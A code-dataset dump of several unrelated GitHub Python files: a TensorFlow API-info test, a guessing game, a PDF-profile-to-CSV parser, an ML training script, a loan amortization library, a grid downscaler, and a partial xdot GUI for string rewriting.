is_list=0},]\\n\"),\n # An op whose input has a variable dtype.\n (\"Abs\", \"Abs\", \"DebugInfo for Abs:\\n\"\n \" param_names=[x, name]\\n\"\n \" defaults_tuple=('Abs',)\\n\"\n \" attributes=[\\n\"\n \" 
{inferred_index=0, name=T, type=type},]\\n\"\n \" inputs=[\\n\"\n \" {index=0, name=x, is_list=0},]\\n\"\n \" inputs_with_type_attr=[\\n\"\n \" {type_attr=T, tensor_params=[0], ok_dtypes=[DT_BFLOAT16, DT_HALF, \"\n \"DT_FLOAT, DT_DOUBLE, DT_INT8, DT_INT16, DT_INT32, DT_INT64]},]\\n\"\n \" inferred_type_attrs=[T]\\n\"),\n # An op with two inputs that have the same (variable) dtype.\n (\"AddV2\", \"AddV2\", \"DebugInfo for AddV2:\\n\"\n \" param_names=[x, y, name]\\n\"\n \" defaults_tuple=('AddV2',)\\n\"\n \" attributes=[\\n\"\n \" {inferred_index=0, name=T, type=type},]\\n\"\n \" inputs=[\\n\"\n \" {index=0, name=x, is_list=0},\\n\"\n \" {index=1, name=y, is_list=0},]\\n\"\n \" inputs_with_type_attr=[\\n\"\n \" {type_attr=T, tensor_params=[0, 1], ok_dtypes=[DT_BFLOAT16, \"\n \"DT_HALF, DT_FLOAT, DT_DOUBLE, DT_UINT8, DT_UINT16, DT_UINT32, \"\n \"DT_UINT64, DT_INT8, DT_INT16, \"\n \"DT_INT32, DT_INT64, DT_COMPLEX64, DT_COMPLEX128]},]\\n\"\n \" inferred_type_attrs=[T]\\n\"),\n # An op with an int attribute.\n (\"GatherV2\", \"GatherV2\", \"DebugInfo for GatherV2:\\n\"\n \" param_names=[params, indices, axis, batch_dims, name]\\n\"\n \" defaults_tuple=(0, 'GatherV2')\\n\"\n \" attributes=[\\n\"\n \" {index=3, name=batch_dims, type=int},\\n\"\n \" {inferred_index=0, name=Tparams, type=type},\\n\"\n \" {inferred_index=1, name=Tindices, type=type},\\n\"\n \" {inferred_index=2, name=Taxis, type=type},]\\n\"\n \" inputs=[\\n\"\n \" {index=0, name=params, is_list=0},\\n\"\n \" {index=1, name=indices, is_list=0},\\n\"\n \" {index=2, name=axis, is_list=0},]\\n\"\n \" inputs_with_type_attr=[\\n\"\n \" {type_attr=Tparams, tensor_params=[0]},\\n\"\n \" {type_attr=Tindices, tensor_params=[1], \"\n \"ok_dtypes=[DT_INT16, DT_INT32, DT_INT64]},\\n\"\n \" {type_attr=Taxis, tensor_params=[2], \"\n \"ok_dtypes=[DT_INT32, DT_INT64]},]\\n\"\n \" inferred_type_attrs=[Tparams, Tindices, Taxis]\\n\"),\n # An op with default attrib values.\n (\"ReduceJoin\", \"ReduceJoin\", \"DebugInfo for ReduceJoin:\\n\"\n \" param_names=[inputs, reduction_indices, keep_dims, separator, name]\\n\"\n \" defaults_tuple=(False, '', 'ReduceJoin')\\n\"\n \" attributes=[\\n\"\n \" {index=2, name=keep_dims, type=bool},\\n\"\n \" {index=3, name=separator, type=string},]\\n\"\n \" inputs=[\\n\"\n \" {index=0, name=inputs, is_list=0},\\n\"\n \" {index=1, name=reduction_indices, is_list=0},]\\n\"\n \" inputs_with_fixed_dtype=[\\n\"\n \" {index=0, dtype=DT_STRING, is_list=0},\\n\"\n \" {index=1, dtype=DT_INT32, is_list=0},]\\n\"),\n # An op with a variable-dtype list input, and an int attribute.\n (\"ParseExampleV2\", \"ParseExampleV2\", \"DebugInfo for ParseExampleV2:\\n\"\n \" param_names=[serialized, names, sparse_keys, dense_keys, \"\n \"ragged_keys, dense_defaults, num_sparse, sparse_types, \"\n \"ragged_value_types, ragged_split_types, dense_shapes, name]\\n\"\n \" defaults_tuple=('ParseExampleV2',)\\n\"\n \" attributes=[\\n\"\n \" {inferred_index=0, name=Tdense, type=list(type)},\\n\"\n \" {index=6, name=num_sparse, type=int},\\n\"\n \" {index=7, name=sparse_types, type=list(type)},\\n\"\n \" {index=8, name=ragged_value_types, type=list(type)},\\n\"\n \" {index=9, name=ragged_split_types, type=list(type)},\\n\"\n \" {index=10, name=dense_shapes, type=list(shape)},]\\n\"\n \" inputs=[\\n\"\n \" {index=0, name=serialized, is_list=0},\\n\"\n \" {index=1, name=names, is_list=0},\\n\"\n \" {index=2, name=sparse_keys, is_list=0},\\n\"\n \" {index=3, name=dense_keys, is_list=0},\\n\"\n \" {index=4, name=ragged_keys, is_list=0},\\n\"\n \" 
{index=5, name=dense_defaults, is_list=1},]\\n\"\n \" inputs_with_fixed_dtype=[\\n\"\n \" {index=0, dtype=DT_STRING, is_list=0},\\n\"\n \" {index=1, dtype=DT_STRING, is_list=0},\\n\"\n \" {index=2, dtype=DT_STRING, is_list=0},\\n\"\n \" {index=3, dtype=DT_STRING, is_list=0},\\n\"\n \" {index=4, dtype=DT_STRING, is_list=0},]\\n\"\n \" inputs_with_type_list_attrs=[\\n\"\n \" {type_list_attr=Tdense, tensor_list_params=[5], \"\n \"ok_dtypes=[DT_FLOAT, DT_INT64, DT_STRING]},]\\n\"\n \" inferred_type_list_attrs=[Tdense]\\n\"),\n # An op with a default dtype\n (\"BroadcastArgs\", \"BroadcastArgs\", \"DebugInfo for BroadcastArgs:\\n\"\n \" param_names=[s0, s1, name]\\n\"\n \" defaults_tuple=('BroadcastArgs',)\\n\"\n \" attributes=[\\n\"\n \" {inferred_index=0, name=T, type=type},]\\n\"\n \" inputs=[\\n\"\n \" {index=0, name=s0, is_list=0},\\n\"\n \" {index=1, name=s1, is_list=0},]\\n\"\n \" inputs_with_type_attr=[\\n\"\n \" {type_attr=T, default_dtype=DT_INT32, tensor_params=[0, 1], \"\n \"ok_dtypes=[DT_INT32, DT_INT64]},]\\n\"\n \" inferred_type_attrs=[T]\\n\"),\n ])\n def testInitializeFromRegisteredOp(self, op_name, debug_info):\n api_info = self.makeConverterForGenOp(op_name)\n self.assertEqual(api_info.DebugInfo().strip(), debug_info.strip())\n\n # This test initializes a PythonAPIInfo from parameter specs,\n # and then uses DebugInfo() to check that the internal state is correct.\n @parameterized.named_parameters([\n (\"NoParams\", \"NoParams\", [], {}, {}, \"DebugInfo for NoParams:\\n\"\n \" param_names=[]\\n\"\n \" defaults_tuple=()\\n\"),\n (\"OnlyNameParam\", \"OnlyNameParam\", [\"name\"], {}, {},\n \"DebugInfo for OnlyNameParam:\\n\"\n \" param_names=[name]\\n\"\n \" defaults_tuple=()\\n\"),\n (\"SomeBinaryOp\", \"SomeBinaryOp\", [\"x\", \"y\"], dict(x=\"T\", y=\"T\"),\n dict(T=\"type\"), \"DebugInfo for SomeBinaryOp:\\n\"\n \" param_names=[x, y]\\n\"\n \" defaults_tuple=()\\n\"\n \" attributes=[\\n\"\n \" {inferred_index=0, name=T, type=type},]\\n\"\n \" inputs=[\\n\"\n \" {index=0, name=x, is_list=0},\\n\"\n \" {index=1, name=y, is_list=0},]\\n\"\n \" inputs_with_type_attr=[\\n\"\n \" {type_attr=T, tensor_params=[0, 1]},]\\n\"\n \" inferred_type_attrs=[T]\\n\"),\n (\"AllAttributeTypes\", \"AllAttributeTypes\", [\n \"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\",\n \"o\", \"p\"\n ], {},\n dict(\n a=\"any\",\n b=\"float\",\n c=\"int\",\n d=\"string\",\n e=\"bool\",\n f=\"type\",\n g=\"shape\",\n h=\"tensor\",\n i=\"list(any)\",\n j=\"list(float)\",\n k=\"list(int)\",\n l=\"list(string)\",\n m=\"list(bool)\",\n n=\"list(type)\",\n o=\"list(shape)\",\n p=\"list(tensor)\"), \"DebugInfo for AllAttributeTypes:\\n\"\n \" param_names=[a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p]\\n\"\n \" defaults_tuple=()\\n\"\n \" attributes=[\\n\"\n \" {index=0, name=a, type=any},\\n\"\n \" {index=1, name=b, type=float},\\n\"\n \" {index=2, name=c, type=int},\\n\"\n \" {index=3, name=d, type=string},\\n\"\n \" {index=4, name=e, type=bool},\\n\"\n \" {index=5, name=f, type=type},\\n\"\n \" {index=6, name=g, type=shape},\\n\"\n \" {index=7, name=h, type=tensor},\\n\"\n \" {index=8, name=i, type=list(any)},\\n\"\n \" {index=9, name=j, type=list(float)},\\n\"\n \" {index=10, name=k, type=list(int)},\\n\"\n \" {index=11, name=l, type=list(string)},\\n\"\n \" {index=12, name=m, type=list(bool)},\\n\"\n \" {index=13, name=n, type=list(type)},\\n\"\n \" {index=14, name=o, type=list(shape)},\\n\"\n \" {index=15, name=p, type=list(tensor)},]\\n\"),\n ])\n def 
testInitializeFromParamSpecs(self, api_name, param_names, input_specs,\n attr_specs, debug_info):\n api_info = self.makeConverterFromParamSpecs(api_name, param_names,\n input_specs, attr_specs)\n self.assertEqual(api_info.DebugInfo().strip(), debug_info.strip())\n\n\nif __name__ == \"__main__\":\n googletest.main()\n","repo_name":"tensorflow/tensorflow","sub_path":"tensorflow/python/framework/python_api_info_test.py","file_name":"python_api_info_test.py","file_ext":"py","file_size_in_byte":10395,"program_lang":"python","lang":"en","doc_type":"code","stars":178918,"dataset":"github-code","pt":"18"} +{"seq_id":"34780998350","text":"import random\nprint(\"I'm thinking of number between 1 and 5\")\nmyNum = random.randint(1,5)\nnoOfAttempt = 1\nwhile True:\n guess = int(input('Take a guess: \\n'))\n if myNum == guess:\n print('Good job! You guessed my number in ' + str(noOfAttempt) + ' attempts')\n break\n elif myNum > guess:\n print('Your guess is too low')\n else:\n print ('your guess is too high')\n noOfAttempt+= 1","repo_name":"fahimkk/automateTheBoringStuff","sub_path":"chapter_2/guessTheNumberWhile.py","file_name":"guessTheNumberWhile.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3950633969","text":"import pdfminer\nfrom pdfminer.high_level import extract_text\nimport sys, os\nfrom pathlib import Path\nfrom subprocess import call\n\nfrom common.enums.status import Status\n\nfrom common.services.components.system_exception import SystemException\nfrom common.services.selenium_service import SeleniumService\nfrom common.services.site.instagram_service import InstagramService\n\nfrom scheduler.services.task_service import TaskService\n\nfrom django.core.management.base import BaseCommand\nfrom google.cloud import bigquery\nfrom google.oauth2 import service_account\n\n\n\n\n\nservice = InstagramService()\nlogger = service.logger\n\n\nclass Command(BaseCommand):\n help = 'Task runner'\n\n def add_arguments(self, parser):\n parser.add_argument('-d', '--develop', action='store_true')\n\n def handle(self, *args, **options):\n # logger.info('Start: Task runner')\n print('Start: Task runner')\n\n driver = None\n\n if options['develop']:\n # logger.info('Develop mode')\n print('Develop mode')\n\n try:\n\n dir_path = os.path.join(os.getcwd(), 'scheduler/pdf/output')\n\n records = []\n records.append(\n \",\".join(['no', 'name', 'birth_day', 'birth_place', 'blood_type', 'special_skill', 'cf', 'height', 'bust', 'west',\n 'hip', 'shoe_size', 'head_circumference', 'around_the_neck', 'girder_length', 'sleeve_length',\n 'inseam', 'shoulder_width'])\n )\n\n for file_name in os.listdir(dir_path):\n print(file_name)\n file_path = os.path.join(dir_path, file_name)\n\n # ファイルをオープンする\n file_data = open(file_path, \"r\")\n\n no = file_name.replace('out', '').replace('.txt', '')\n name = ''\n is_birth_day = False\n birth_day = ''\n is_birth_place = False\n birth_place = ''\n blood_type = ''\n is_special_skill = False\n special_skill = ''\n is_cf = False\n cfs = []\n height = ''\n bust = ''\n west = ''\n hip = ''\n shoe_size = ''\n head_circumference = ''\n around_the_neck = ''\n girder_length = ''\n sleeve_length = ''\n inseam = ''\n shoulder_width = ''\n\n # 一行ずつ読み込んでは表示する\n for line in file_data:\n print(line)\n if name == '':\n name = (line or '').strip()\n\n if '【生年月日】' in line:\n is_birth_day = True\n\n if is_birth_day and '【生年月日】' not in line and birth_day == '':\n birth_day = (line or 
'').strip().replace(' ', ' ').split(' ')[0]\n birth_day = birth_day.replace('年', '/').replace('月', '/').replace('日生', '')\n continue\n\n if '【 出身地 】' in line:\n is_birth_place = True\n\n if is_birth_place and '【 出身地 】' not in line and birth_place == '':\n birth_place = (line or '').strip()\n continue\n\n if blood_type == '':\n candidate_blood_type = (line or '').strip()\n if candidate_blood_type in ['A', 'B', 'AB', 'O']:\n blood_type = candidate_blood_type\n continue\n\n if '【 特技 】' in line or '【 特技 】' in line:\n is_special_skill = True\n\n if is_special_skill and ('【 特技 】' not in line and '【 特技 】' not in line) and special_skill == '':\n special_skill = (line or '').strip()\n if special_skill == '【 サイズ 】':\n special_skill = ''\n\n if '【CF】' in line:\n is_cf = True\n\n if is_cf and '【CF】' not in line:\n candidate_cf = (line or '').strip()\n if '・' in candidate_cf:\n cfs.append(candidate_cf)\n\n if '【 サイズ 】' in line:\n is_birth_day = False\n is_birth_place = False\n is_special_skill = False\n is_cf = False\n continue\n\n if '身  長:' in line or '長:' in line:\n height = ((line or '').split('長:')[1] or '').replace('cm', '').strip()\n continue\n\n if 'バ ス ト:' in line:\n bust = ((line or '').split('バ ス ト:')[1] or '').replace('cm', '').strip()\n continue\n\n if 'ウエスト:' in line:\n west = ((line or '').split('ウエスト:')[1] or '').replace('cm', '').strip()\n continue\n\n if 'ヒ ッ プ:' in line:\n hip = ((line or '').split('ヒ ッ プ:')[1] or '').replace('cm', '').strip()\n continue\n\n if '靴サイズ:' in line:\n shoe_size = ((line or '').split('靴サイズ:')[1] or '').replace('cm', '').strip()\n continue\n\n if '頭回り:' in line:\n head_circumference = ((line or '').split('頭回り:')[1] or '').replace('cm', '').strip()\n continue\n\n if '首回り:' in line:\n around_the_neck = ((line or '').split('首回り:')[1] or '').replace('cm', '').strip()\n continue\n\n if '桁 丈:' in line or '桁 丈:' in line:\n girder_length = ((line or '').replace('桁 丈:', '桁 丈:').split('桁 丈:')[1] or '').replace('cm', '').strip()\n continue\n\n if '袖 丈:' in line or '袖 丈:' in line:\n sleeve_length = ((line or '').replace('袖 丈:', '袖 丈:').split('袖 丈:')[1] or '').replace('cm', '').strip()\n continue\n\n if '股 下:' in line or '股 下:' in line:\n inseam = ((line or '').replace('股 下:', '股 下:').split('股 下:')[1] or '').replace('cm', '').strip()\n continue\n\n if '肩 幅:' in line or '肩 幅:' in line:\n shoulder_width = ((line or '').replace('肩 幅:', '肩 幅:').split('肩 幅:')[1] or '').replace('cm', '').strip()\n continue\n\n records.append(\n \",\".join([no, name, birth_day, birth_place, blood_type, special_skill, ' / '.join(cfs), height, bust, west, hip, shoe_size,\n head_circumference, around_the_neck, girder_length, sleeve_length, inseam,\n shoulder_width])\n )\n\n # records.append(\"\\n\".join(record))\n\n csv_text = \"\\n\".join(records)\n\n pdf_write_path = os.path.join(os.getcwd(), 'scheduler/pdf/out/extract.csv')\n\n with open(pdf_write_path, mode='w') as f:\n f.write(csv_text)\n\n\n\n return\n\n service.throw(3, file_name, message)\n\n\n\n except SystemException as se:\n logger.error(se.__str__())\n if driver is not None:\n driver.close()\n\n except Exception as e:\n logger.error(e.__str__())\n if driver is not None:\n driver.close()\n\n\n exit(0)\n\n# pdfへの出力\ndef out_to_pdf():\n pdf_read_path = os.path.join(os.getcwd(), 'scheduler/pdf/プロフィール301-9999.pdf')\n\n for i in range(55):\n num = i + 1 + 300\n pdf_read_text = extract_text(pdf_read_path, page_numbers=[i])\n print(pdf_read_text)\n\n pdf_write_path = os.path.join(os.getcwd(), 'scheduler/pdf/out/out' + str(num) + '.txt')\n\n 
with open(pdf_write_path, mode='w') as f:\n f.write(pdf_read_text)\n","repo_name":"fukan-data/fukan-data-sobayonin-v8-1","sub_path":"app/scheduler/management/commands/test_pdf_reader.py","file_name":"test_pdf_reader.py","file_ext":"py","file_size_in_byte":8467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13665238105","text":"import numpy as np \nimport pandas as pd\n\nfrom sklearn.model_selection import train_test_split\nimport joblib\n\nimport pipeline # Other file\nimport config # Other file\n\ndef run_training():\n print(\"Training model...\")\n\n data = pd.read_csv(config.TRAINING_DATA_FILE)\n X_train, X_test, y_train, y_test = train_test_split(\n data[config.FEATURES], \n data[config.TARGET],\n test_size=0.1,\n random_state=0\n )\n\n pipeline.breast_cancer_classification.fit(X_train[config.FEATURES], y_train)\n joblib.dump(pipeline.breast_cancer_classification, config.PIPELINE_NAME)\n\n print(\"Training has finished.\")\n\nif __name__ == '__main__':\n run_training()","repo_name":"omartinez182/ml-in-production","sub_path":"train_pipeline.py","file_name":"train_pipeline.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11385075740","text":"# -*- coding: utf-8 -*-\nimport datetime as dt\nimport calendar as cal\nimport collections\nfrom decimal import Decimal\nfrom dateutil.relativedelta import relativedelta\n\nPayment=collections.namedtuple('Payment',['date','payment_amount','interest_amount','principal_amount','special_principal_amount','total_principal_amount','loan_balance_amount'])\n\nSpecial_Payment=collections.namedtuple('Special_Payment',['payment_amount','first_payment_date','special_payment_term','annual_payments'])\nLoan_Summary=collections.namedtuple('Loan_Summary',['loan_amount','total_payment_amount','total_interest_amount','residual_loan_balance'])\n\n# To-do:\n### Actual/Actual\n\nclass Loan(object):\n\n def __init__(self,loan_amount,interest_rate,loan_term,start_date,payment_amount=None,first_payment_date=None,payment_end_of_month=True,end_date=False,interest_only_period=0,annual_payments=12,compounding_method='30E/360'):\n self.loan_amount=Decimal(str(loan_amount))\n self.interest_rate=Decimal(str(interest_rate/100)).quantize(Decimal(str(0.0001)))\n self.laon_term=loan_term\n self.payment_amount=payment_amount\n self.start_date=dt.datetime.strptime(start_date,'%Y-%m-%d')\n self.first_payment_date=dt.datetime.strptime(first_payment_date,'%Y-%m-%d') if first_payment_date is not None else None\n self.payment_end_of_month = payment_end_of_month\n self.end_date=end_date\n self.interest_only_period=interest_only_period\n self.annual_payments=annual_payments\n self.compounding_method=compounding_method\n self.special_payments=[]\n self.special_payments_schedule=[]\n self.no_of_payments=self.laon_term * self.annual_payments\n self.delta_dt=Decimal(str(12/self.annual_payments))\n\n @staticmethod\n def _quantize(amount):\n return Decimal(str(amount)).quantize(Decimal(str(0.01)))\n @staticmethod\n def _get_day_count(dt1,dt2,method,eom=False):\n y1, m1, d1 = dt1.year, dt1.month, dt1.day\n y2, m2, d2 = dt2.year, dt2.month, dt2.day\n dt1_eom_day=cal.monthrange(y1,m1)[1]\n dt2_eom_day=cal.monthrange(y2,m2)[1]\n\n if method in {'30A/360','30U/360','30E/360','30E/360 ISDA'}:\n if method=='30A/360':\n d1 = min(d1,30)\n d2 = min(d2,30) if d1 == 30 else d2\n if method=='30U/360':\n if eom and m1 == 2 and d1==dt1_eom_day 
and m2==2 and d2==dt2_eom_day:\n d2=30\n if eom and m1 == 2 and d1==dt1_eom_day:\n d1=30\n if d2 == 31 and d1 >= 30:\n d2=30\n if d1==31:\n d1=30\n if method=='30E/360':\n if d1 == 31:\n d1=30\n if d2 == 31:\n d2=30\n if method=='30E/360 ISDA':\n if d1==dt1_eom_day:\n d1=30\n if d2==dt2_eom_day and m2 != 2:\n d2=30\n\n day_count = (360*(y2-y1)+30*(m2-m1)+(d2-d1))\n year_days = 360\n\n if method=='A/365F':\n day_count=(dt2-dt1).days\n year_days=365\n\n if method=='A/360':\n day_count=(dt2-dt1).days\n year_days=360\n\n factor = day_count / year_days\n return factor\n\n @staticmethod\n def _get_special_payment_schedule(self,special_payment):\n no_of_payments=special_payment.special_payment_term * special_payment.annual_payments\n annual_payments = special_payment.annual_payments\n dt0=dt.datetime.strptime(special_payment.first_payment_date,'%Y-%m-%d')\n special_payment_amount=self._quantize(special_payment.payment_amount)\n initial_special_payment=Payment(date=dt0,payment_amount=self._quantize(0),interest_amount=self._quantize(0),principal_amount=self._quantize(0),special_principal_amount=special_payment_amount,total_principal_amount=self._quantize(0),loan_balance_amount=self._quantize(0))\n special_payment_schedule=[initial_special_payment]\n\n for i in range(1,no_of_payments):\n date=dt0+relativedelta(months=i*12/annual_payments)\n special_payment=Payment(date=date,payment_amount=self._quantize(0),interest_amount=self._quantize(0),principal_amount=self._quantize(0),special_principal_amount=special_payment_amount,total_principal_amount=self._quantize(0),loan_balance_amount=self._quantize(0))\n special_payment_schedule.append(special_payment)\n\n return special_payment_schedule\n\n def get_payment_schedule(self):\n initial_payment=Payment(date=self.start_date,payment_amount=self._quantize(0),interest_amount=self._quantize(0),principal_amount=self._quantize(0),special_principal_amount=self._quantize(0),total_principal_amount=self._quantize(0),loan_balance_amount=self._quantize(self.loan_amount))\n payment_schedule=[initial_payment]\n\n if self.payment_amount is None:\n regular_principal_payment_amount= self.loan_amount*((self.interest_rate/self.annual_payments)*(1+(self.interest_rate/self.annual_payments))**(self.no_of_payments))/((1+(self.interest_rate/self.annual_payments))**(self.no_of_payments)-1)\n else:\n regular_principal_payment_amount=self.payment_amount\n\n if self.first_payment_date is None:\n if self.payment_end_of_month==True:\n if self.start_date.day == cal.monthrange(self.start_date.year,self.start_date.month)[1]:\n dt0 = self.start_date\n else:\n dt0 = dt.datetime(self.start_date.year,self.start_date.month,cal.monthrange(self.start_date.year,self.start_date.month)[1],0,0)+relativedelta(months=-12/self.annual_payments)\n else:\n dt0 = self.start_date\n else:\n dt0=self.first_payment_date+relativedelta(months=-12/self.annual_payments)\n\n # take care of special payments\n special_payments_schedule_raw=[]\n special_payments_schedule=[]\n special_payments_dates=[]\n if len(self.special_payments_schedule)>0:\n for i in range(len(self.special_payments_schedule)):\n for j in range(len(self.special_payments_schedule[i])):\n special_payments_schedule_raw.append([self.special_payments_schedule[i][j].date,self.special_payments_schedule[i][j].special_principal_amount])\n if self.special_payments_schedule[i][j].date not in special_payments_dates:\n special_payments_dates.append(self.special_payments_schedule[i][j].date)\n\n for i in range(len(special_payments_dates)):\n 
amt=self._quantize(str(0))\n for j in range(len(special_payments_schedule_raw)):\n if special_payments_schedule_raw[j][0]==special_payments_dates[i]:\n amt+=special_payments_schedule_raw[j][1]\n special_payments_schedule.append([special_payments_dates[i],amt])\n\n # calculate payment schedule\n m=0\n for i in range(1,self.no_of_payments+1):\n\n date=dt0+relativedelta(months=i*12/self.annual_payments)\n if self.payment_end_of_month==True and self.first_payment_date is None:\n eom_day=cal.monthrange(date.year,date.month)[1]\n date=date.replace(day=eom_day)#dt.datetime(date.year,date.month,eom_day)\n\n special_principal_amount= self._quantize(0)\n bop_date = payment_schedule[(i+m)-1].date\n compounding_factor=Decimal(str(self._get_day_count(bop_date,date,self.compounding_method,eom=self.payment_end_of_month)))\n balance_bop=self._quantize(payment_schedule[(i+m)-1].loan_balance_amount)\n\n for j in range(len(special_payments_schedule)):\n if date == special_payments_schedule[j][0]:\n special_principal_amount = special_payments_schedule[j][1]\n if (bop_date < special_payments_schedule[j][0] and special_payments_schedule[j][0] < date):\n # handle special payment inserts\n compounding_factor= Decimal(str(self._get_day_count(bop_date,special_payments_schedule[j][0],self.compounding_method,eom=self.payment_end_of_month)))\n interest_amount = self._quantize(0) if balance_bop == Decimal(str(0)) else self._quantize(balance_bop*self.interest_rate*compounding_factor)\n principal_amount= self._quantize(0)\n special_principal_amount = self._quantize(0) if balance_bop == Decimal(str(0)) else min(special_payments_schedule[j][1]-interest_amount,balance_bop)\n total_principal_amount=min(principal_amount+special_principal_amount,balance_bop)\n total_payment_amount=total_principal_amount+interest_amount\n balance_eop = max(balance_bop-total_principal_amount,self._quantize(0))\n payment = Payment(date=special_payments_schedule[j][0], payment_amount=total_payment_amount,interest_amount=interest_amount,principal_amount=principal_amount,special_principal_amount=special_principal_amount,total_principal_amount=special_principal_amount,loan_balance_amount=balance_eop)\n payment_schedule.append(payment)\n m+=1\n # handle regular payment inserts : update bop_date and bop_date, and special_principal_amount\n bop_date=special_payments_schedule[j][0]\n balance_bop=balance_eop\n special_principal_amount=self._quantize(0)\n compounding_factor=Decimal(str(self._get_day_count(bop_date,date,self.compounding_method,eom=self.payment_end_of_month)))\n\n interest_amount= self._quantize(0) if balance_bop == Decimal(str(0)) else self._quantize(balance_bop*self.interest_rate*compounding_factor)\n principal_amount = self._quantize(0) if balance_bop == Decimal(str(0)) else min(self._quantize(regular_principal_payment_amount)-interest_amount,balance_bop)\n special_principal_amount=min(balance_bop-principal_amount,special_principal_amount)\n total_principal_amount= min(principal_amount+special_principal_amount,balance_bop)\n total_payment_amount=total_principal_amount+interest_amount\n balance_eop = max(balance_bop-total_principal_amount,self._quantize(0))\n\n payment=Payment(date=date,payment_amount=total_payment_amount,interest_amount=interest_amount,principal_amount=principal_amount,special_principal_amount=special_principal_amount,total_principal_amount=total_principal_amount,loan_balance_amount=balance_eop)\n payment_schedule.append(payment)\n\n return payment_schedule\n\n def 
add_special_payment(self,payment_amount,first_payment_date,special_payment_term,annual_payments):\n special_payment=Special_Payment(payment_amount=payment_amount,first_payment_date=first_payment_date,special_payment_term=special_payment_term,annual_payments=annual_payments)\n self.special_payments.append(special_payment)\n self.special_payments_schedule.append(self._get_special_payment_schedule(self,special_payment))\n\n def get_loan_summary(self):\n payment_schedule=self.get_payment_schedule()\n total_payment_amount=0\n total_interest_amount=0\n total_principal_amount=0\n for payment in payment_schedule:\n total_payment_amount +=payment.payment_amount\n total_interest_amount +=payment.interest_amount\n total_principal_amount +=payment.total_principal_amount\n\n loan_summary=Loan_Summary(loan_amount=self.loan_amount,total_payment_amount=total_payment_amount,total_interest_amount=total_interest_amount,residual_loan_balance=self._quantize(self.loan_amount-total_principal_amount))\n\n return loan_summary\n","repo_name":"sudo-dakix/pyloan","sub_path":"build/lib/pyloan/pyloan.py","file_name":"pyloan.py","file_ext":"py","file_size_in_byte":11829,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"3439318678","text":"\r\n##################################################################################################################\r\n\"\"\"\r\n\r\n\"\"\"\r\n\r\n# Built-in/Generic Imports\r\n\r\n# Libs\r\nimport numpy as np\r\n\r\n# Own modules\r\n\r\n\r\n__version__ = '1.1.1'\r\n__author__ = 'Victor Guillet'\r\n__date__ = '26/04/2020'\r\n\r\n##################################################################################################################\r\n\r\n\r\ndef reduce_grid_scale(array, scale_factor):\r\n vertical_chunk_count = int(array.shape[0] / scale_factor)\r\n horizontal_chunk_count = int(array.shape[1] / scale_factor)\r\n\r\n downscaled_array = np.zeros((vertical_chunk_count, horizontal_chunk_count))\r\n\r\n # --> Iterate through chunks\r\n for chunk_y in range(vertical_chunk_count):\r\n for chunk_x in range(horizontal_chunk_count):\r\n feature_counter = 0\r\n\r\n # --> Iterate through tiles in chunk\r\n for tile_y in range(scale_factor):\r\n for tile_x in range(scale_factor):\r\n if array[(chunk_y * scale_factor) + tile_y][(chunk_x * scale_factor) + tile_x] == 1:\r\n feature_counter += 1\r\n else:\r\n pass\r\n\r\n # -> Flag tile as obstacle if obstacle counter is too high\r\n if feature_counter >= 2:\r\n downscaled_array[chunk_y][chunk_x] = 1\r\n\r\n return downscaled_array\r\n","repo_name":"vguillet/RSAI_Engine","sub_path":"src/Simulation/Environment/Grids/Tools/Grid_tools.py","file_name":"Grid_tools.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"3367904655","text":"from copy import deepcopy\nfrom dataclasses import dataclass\nfrom functools import partial\n\nimport gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\nfrom xdot import DotWidget, DotWindow\nfrom xdot.ui.elements import Edge, Node\n\nfrom string_rewrite import get_machine_i, Rewrite, RewriteSystem, Word\n\n\nclass GUI(DotWidget):\n def __init__(self, srs):\n super().__init__()\n self.srs = deepcopy(srs)\n self.srs.prune()\n self.undo_stack = []\n self.refresh()\n\n def refresh(self):\n self.set_dotcode('\\n'.join(self.dot_lines()).encode())\n return True\n\n def on_key_press_event(self, widget, 
event):\n if event.keyval == Gdk.KEY_s:\n return self.action('simplify')\n elif event.keyval == Gdk.KEY_z:\n return self.on_undo()\n return super().on_key_press_event(widget, event)\n\n def on_click(self, element, event):\n if isinstance(element, Edge):\n if event.button == 1:\n rw, restricted = self.edges[element.src.id, element.dst.id]\n return self.action('split_rule', rw, 'f', restricted.f)\n else:\n rw, restricted = self.edges[element.src.id, element.dst.id]\n return self.action('split_rule', rw, 't', restricted.t)\n elif isinstance(element, Node):\n if event.button == 1:\n return self.action('split_rules', 'f', '0'+self.nodes[element.id])\n else:\n return self.action('split_rules', 'f', self.nodes[element.id]+'0')\n return super().on_click(element, event)\n\n def dot_lines(self):\n self.nodes = {} # id -> Word\n self.edges = {} # (src_id, dst_id) -> (rewrite, restricted_rewrite)\n yield 'digraph G {'\n for i, cat in enumerate(('halting', 'cycling')):\n if self.srs.special_words[cat]:\n for w in self.srs.special_words[cat]:\n self.nodes[str(w).encode()] = w\n yield f'\"{str(w)}\" [peripheries={i+2}]'\n self.nodes.update((str(rw.f).encode(), rw.f) for rw in self.srs.rewrites)\n for rw in self.srs.rewrites:\n for w in self.nodes.values():\n restricted = rw.then(Rewrite(w, w))\n if restricted is not None:\n self.edges[str(rw.f).encode(), str(w).encode()] = (rw, restricted)\n yield f'\"{str(rw.f)}\" -> \"{str(w)}\" [label=\"{str(rw)}\"]'\n yield '}'\n\n def action(self, method, *args):\n self.undo_stack.append((deepcopy(self.srs), f'{method}{args}'))\n print('ACTION', self.undo_stack[-1][1])\n getattr(self.srs, method)(*args)\n self.srs.prune()\n print(self.srs)\n print()\n return self.refresh()\n\n def on_undo(self):\n if self.undo_stack:\n self.srs, action = self.undo_stack.pop()\n print('UNDO', action)\n return self.refresh()\n\n\nif __name__ == '__main__':\n from argparse import ArgumentParser\n ap = ArgumentParser(description='Try to simplify a TM as a string rewriting system.')\n ap.add_argument('-d', 